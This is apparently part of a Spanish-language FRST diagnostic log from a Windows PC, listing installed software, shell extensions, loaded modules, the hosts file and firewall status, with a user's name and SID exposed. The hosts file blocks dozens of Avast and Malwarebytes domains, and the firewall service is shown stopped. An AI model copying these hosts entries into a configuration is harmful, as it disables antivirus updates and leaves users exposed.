Service Pack 2 para SQL Server 2008 (KB2285068) (64-bit) (HKLM\...\KB2285068) (Version: 10.2.4000.0 - Microsoft Corporation)
Shape Collage (HKLM-x32\...\ShapeCollage) (Version:  - Vincent Cheung)
Smilebox (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Smilebox) (Version: 1.0.0.31741 - Smilebox, Inc.)
SpeechRedist (HKLM-x32\...\{8795CBED-55E2-4693-9F14-84EC446935BE}) (Version: 1.0.0 - Epic Games Inc.)
Sql Server Customer Experience Improvement Program (HKLM\...\{2F14965D-567B-4E59-ADEB-0A2CC1E3ADDF}) (Version: 10.2.4000.0 - Microsoft Corporation) Hidden
STATISTICA CambridgeSoft Integration (HKLM-x32\...\{A1E1083D-249D-483C-AD92-CDCFA230A4C7}) (Version: 1.00.0000 - StatSoft, Inc.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 13.2.2.0 - Synaptics Incorporated)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
Technitium MAC Address Changer v6.0 (HKLM-x32\...\TMACv6.0) (Version: 6.0 - Technitium)
ThermoSolver 1.0 (HKLM-x32\...\ThermoSolver 1.0_is1) (Version:  - )
Thumbnail me 3.0 Beta (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Thumbnail me 3.0 Beta) (Version:  - )
Ulead VideoStudio SE DVD (HKLM-x32\...\{8F8D9297-FDD2-405A-97E7-E52C7B2F97B3}) (Version: 10.0 - Ulead Systems)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-0011-0000-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.VISPRO_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-012B-0C0A-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
USB2.0 ATV (HKLM-x32\...\{3C873221-12B9-475D-8DCB-62D0B2179AF9}) (Version: 6.10.000.001 - Regulus)
VB 2010 SBS (HKLM-x32\...\{0C133A44-18C5-406B-9A6B-1E696CCDF809}) (Version: 2.00.11 - Microsoft Press)
VBA (2720) (HKLM-x32\...\{FC45B592-2DE6-11D3-A113-00805FEAD43C}) (Version: 6.01.00.1234 - Microsoft Corporation) Hidden
VidLord (HKLM-x32\...\{B85316D9-534F-4F79-927B-9D990762DC2C}) (Version: 6.0.0 - Knight Consulting)
Visual Basic for Applications (HKLM-x32\...\VBA) (Version:  - )
Visual C++ Runtime for Dragon NaturallySpeaking 64bit (x64) (HKLM\...\{4A5A427F-BA39-4BF0-9A47-7777FBE60C9F}) (Version: 10.00.800.228 - Nuance Communications Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{95480F46-25D7-31D1-ACD2-D8722B133A0C}) (Version: 10.0.30319 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{CF72A524-84BD-4AB7-B3C6-2C358672CD15}) (Version: 4.0.8080.0 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
Welcome App (Start-up experience) (HKLM-x32\...\{828175FA-7307-4DBF-95AD-9CEE086B6F45}) (Version: 12.0.14000 - Nero AG) Hidden
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.00.3008 - Acer Incorporated)
WinAVI All in One Converter (HKLM-x32\...\WinAVI All in One Converter) (Version: 1.6.0.4147 - ZJMedia Digital Technology Ltd.)
WinAVI Video Converter 9.0 (HKLM-x32\...\WinAVI Video Converter 9.09.0) (Version: 9.0 - WinAVI Video Converter 9.0)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{953D4586-9A16-495E-BA1F-EE5AA66604DB}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wondershare Filmora(Build 8.7.0) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
XML Copy Editor version 1.2.1.2 (HKLM\...\XML Copy Editor_is1) (Version: 1.2.1.2 - Zane U. Ji)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\system32\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
SSODL-x32: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\SysWow64\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [			IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2019-05-02] (Tonec Inc. -> Tonec Inc.)
ShellIconOverlayIdentifiers: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ShellIconOverlayIdentifiers-x32: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} =>  -> Ningún archivo
ContextMenuHandlers1: [AimersoftVideoConverterFileOpreation] -> {1AACB93E-AA97-47F1-BD02-8D2AF2815436} => C:\Windows\SysWOW64\AiCM64.dll [2013-08-23] () [Archivo no firmado]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll [2012-06-18] () [Archivo no firmado]
ContextMenuHandlers1: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} =>  -> Ningún archivo
ContextMenuHandlers1: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers1: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [PDFC7.ShellExtension] -> {877327F4-8A93-4320-932C-338069C27BEA} => C:\Program Files (x86)\Nuance\PDF Professional 7\ShellExt70.dll [2011-04-28] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [Zeon.MFCDirectShellExt] -> {353C642C-F13D-4699-9FF2-EFAF490B6C69} => C:\Program Files (x86)\Nuance\PDF Professional 7\bin\DirectShellExt.dll [2010-07-16] (Zeon Corporation -> Zeon International Investment Corp. )
ContextMenuHandlers2-x32: [Ulead UDF Driver] -> {DBD8E168-244D-448C-9922-25508950D1DC} => C:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll [2005-03-02] (Ulead Systems, Inc.) [Archivo no firmado]
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers4: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers4-x32: [SimpleShlExt] -> {A53118EA-E89E-49BD-AB1B-AB180BB12CFE} => C:\Program Files (x86)\Clarus\Samsung Auto Backup\ShContextMenu.dll [2010-07-28] (Clarus, Inc.) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Lista blanca) ====================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\system32\ficvdec_x64.dll [652288 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32: [vidc.i420] => C:\Windows\SysWOW64\i420vfw.dll [70656 2004-01-24] (www.helixcommunity.org) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.dvacm] => C:\Program Files (x86)\Common Files\Ulead Systems\VIO\DVACM.acm [32768 2006-03-06] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.MPEGacm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\MPEGACM.acm [69632 2004-07-23] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.ulmp3acm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\ulmp3acm.acm [319488 2006-01-23] (Ulead systems) [Archivo no firmado]
HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\SysWOW64\ficvdec_x86.dll [641024 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32-x32: [vidc.XVID] => xvidvfw.dll
HKLM\...\Drivers32-x32: [VIDC.VP80] => vp8vfw.dll

==================== Accesos directos & WMI ========================

(Las entradas pueden ser listadas para ser restauradas o eliminadas.)

ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Twitter.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory="Profile 1" --app-id=jgeocpdicgmkeemopbanhokmhcgcflmi
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Marco - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Acer Accessorios.lnk -> C:\Program Files\Acer Accessory Store\StartURL.exe () -> hxxp://store.acer-euro.com/es?utm_source=Icon&utm_medium=Icon&utm_campaign=Acer%2BInternal

==================== Módulos cargados (Lista blanca) =============

2017-04-01 22:23 - 2016-07-21 10:54 - 000137728 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-04-01 22:23 - 2016-10-08 17:03 - 001506304 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-05-05 02:32 - 2016-07-21 09:54 - 000137728 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2018-05-05 02:32 - 2017-09-12 09:34 - 001506304 _____ () [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2008-09-28 18:55 - 2008-09-28 18:55 - 001076224 _____ () [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2009-02-02 18:33 - 2009-02-02 18:33 - 000460199 _____ () [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2012-06-18 09:24 - 2012-06-18 09:24 - 000222720 _____ () [Archivo no firmado] C:\Program Files (x86)\Notepad++\NppShell_05.dll
2017-08-11 22:05 - 2017-07-26 09:16 - 000029696 _____ () [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\WinDivert.dll
2020-03-26 18:40 - 2020-03-26 18:40 - 000876544 _____ () [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-OCJQN.tmp\MouliaLeFil.tmp
2020-03-26 18:41 - 2008-07-23 20:37 - 000203264 _____ () [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-Q7DRE.tmp\itdownload.dll
2017-09-08 17:39 - 2018-11-10 20:15 - 000004096 _____ () [Archivo no firmado] C:\Windows\[email protected]
2017-08-26 15:53 - 2013-08-23 12:36 - 000721263 _____ () [Archivo no firmado] C:\Windows\SysWOW64\AiCM64.dll
2017-04-09 19:33 - 2017-07-26 09:15 - 000537088 _____ (FreeDownloadManager.org) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\common.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000071680 _____ (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzinw12.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000089600 ____N (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzipm12.dll
2010-11-18 20:08 - 2010-11-18 20:08 - 000086016 _____ (Igor Pavlov) [Archivo no firmado] C:\Program Files\7-Zip\7-zip.dll
2009-12-01 07:50 - 2009-06-04 12:05 - 000077824 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ESP\IAAMon_ESP.dll
2009-12-01 07:50 - 2009-06-04 12:04 - 000126976 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ESP\PlugInRAID_ESP.dll
2009-12-01 07:50 - 2009-06-04 11:55 - 000208896 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ISDI.dll
2002-02-14 14:00 - 2002-02-14 14:00 - 000024576 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\3082\mdmui.dll
2008-06-05 11:57 - 2008-06-05 11:57 - 001047552 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MFC71U.DLL
2008-06-05 11:57 - 2008-06-05 11:57 - 000499712 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MSVCP71.dll
2008-06-05 11:57 - 2008-06-05 11:57 - 000348160 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\MSVCR71.dll
2019-03-27 23:48 - 2019-03-27 23:48 - 000115200 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\Microsoft.Net\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
2020-03-26 18:40 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-Q7DRE.tmp\idp.dll
2009-09-23 19:20 - 2009-09-23 19:20 - 000045056 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\agent_stub.dll
2009-09-23 19:26 - 2009-09-23 19:26 - 000400896 ____N (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ISchedule.DLL
2009-09-23 19:26 - 2009-09-23 19:26 - 000329216 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IShadowS3.dll
2009-09-23 19:23 - 2009-09-23 19:23 - 000012800 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\MUI\0c0a\lang.dll
2009-09-23 19:25 - 2009-09-23 19:25 - 000044544 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\Pehook.DLL
2009-09-23 19:27 - 2009-09-23 19:27 - 000403456 ____N (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\SyncDll.DLL
2009-09-23 19:19 - 2009-09-23 19:19 - 000057856 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\VssAgent.dll
2009-09-23 19:20 - 2009-09-23 19:20 - 000018944 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\WirelessDll.dll
2009-06-17 17:05 - 2009-06-17 17:05 - 000010240 _____ (NewTech Infosystems, Inc.) [Archivo no firmado] C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvcLOC.dll
2009-07-26 20:41 - 2009-07-26 20:41 - 000220160 _____ (PowerISO Computing, Inc.) [Archivo no firmado] C:\Program Files (x86)\PowerISO\PWRISOSH.DLL
2016-03-25 13:30 - 2016-03-25 13:33 - 000277016 _____ (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado] C:\Program Files\ExamDiff Pro\EDPShell.dll
2020-03-26 11:34 - 2020-03-26 11:34 - 001008128 _____ (Robert Simpson, et al.) [Archivo no firmado] C:\ProgramData\Logic Cramble\x86\SQLite.Interop.dll
2017-04-09 19:33 - 2017-07-26 09:20 - 005664256 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Core.dll
2017-04-09 19:33 - 2016-03-03 14:26 - 006019072 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Gui.dll
2017-04-09 19:33 - 2016-03-03 14:23 - 001064960 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Network.dll
2017-04-09 19:33 - 2016-03-03 14:21 - 000203776 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Sql.dll
2017-04-09 19:33 - 2016-03-03 14:32 - 005472768 _____ (The Qt Company Ltd) [Archivo no firmado] C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\Qt5Widgets.dll
2020-03-26 18:41 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-Q7DRE.tmp\psvince.dll
2017-04-01 22:23 - 2016-10-08 17:04 - 000708608 _____ (Wondershare) [Archivo no firmado] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-05-05 02:32 - 2017-09-12 09:36 - 000708608 _____ (Wondershare) [Archivo no firmado] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Lista blanca) ========

(Si una entrada es incluida en el fixlist, solamente los ADS serán eliminados.)

AlternateDataStreams: C:\ProgramData\Temp:0574215C [120]
AlternateDataStreams: C:\ProgramData\Temp:D95ACC7D [135]

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE trusted site: HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2017-11-17 19:06 - 2019-10-03 00:23 - 000010877 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1  telemetry.malwarebytes.com
127.0.0.1  skipittok.com
127.0.0.1	gf.tools.avast.com
127.0.0.1	pair.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	id.avast.com
127.0.0.1	s5355946.iavs9x.u.avast.com
127.0.0.1	s5355946.ivps9x.u.avast.com
127.0.0.1	s5355946.ivps9tiny.u.avast.com
127.0.0.1	s5355946.vpsnitro.u.avast.com
127.0.0.1	s5355946.vpsnitrotiny.u.avast.com
127.0.0.1	s5355946.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com
127.0.0.1	submit5.avast.com
127.0.0.1	geoip.avast.com
127.0.0.1	l2932126.iavs9x.u.avast.com
127.0.0.1	l2932126.ivps9x.u.avast.com
127.0.0.1	l2932126.ivps9tiny.u.avast.com
127.0.0.1	l2932126.vpsnitro.u.avast.com
127.0.0.1	l2932126.vpsnitrotiny.u.avast.com
127.0.0.1	l2932126.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com

Hay 243 más lineas.


2012-05-07 12:19 - 2012-05-07 12:20 - 000000441 _____ C:\Windows\system32\drivers\etc\hosts.ics

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\wbem;C:\PROGRA~2\COMMON~1\ASPENT~1;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64;c:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\DTS\Binn;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared;C:\Program Files (x86)\Smart Projects\IsoBuster;C:\Program Files (x86)\QuickTime\QTSystem\;c:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 10.0.196.141 - 189.198.222.137
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => El servicio de Firewall de Windows no se está ejecutando.
MpsSvc => El servicio de Firewall de Windows no se está ejecutando.

